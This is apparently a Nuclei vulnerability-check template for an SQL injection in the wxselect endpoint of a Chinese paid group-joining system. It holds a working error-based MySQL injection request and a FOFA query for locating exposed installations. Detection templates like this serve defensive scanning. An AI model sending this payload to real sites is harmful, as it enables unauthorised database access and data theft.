http:
    - matchers:
        - part: body
          type: word
          words:
            - e10adc3949ba59abbe56e057f20f883e
      raw:
        - |
          POST /group/index/wxselect HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
          Content-Type: application/x-www-form-urlencoded

          orderid=') AND GTID_SUBSET(CONCAT((MID((IFNULL(CAST(MD5(123456) AS NCHAR),0x7e)),1,190))),5417)-- ylIU
id: 9kuai9-wxselect-sql
info:
    author: Superhero
    description: |-
        fofa: body="/website/index/login.html"
        九块九付费进群系统 wxselect 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
    name: 九块九付费进群系统 wxselect SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247487713&idx=1&sn=d5cdc697ad0ac43e57cf0aec430f3b42&chksm=c267a5d2f5102cc47976208b855df0126ec5b48ecf14a179f10c5c622a1ba1c11b5c9469fa5e&token=1439003696&lang=zh_CN#rd
    severity: high
    tags: []
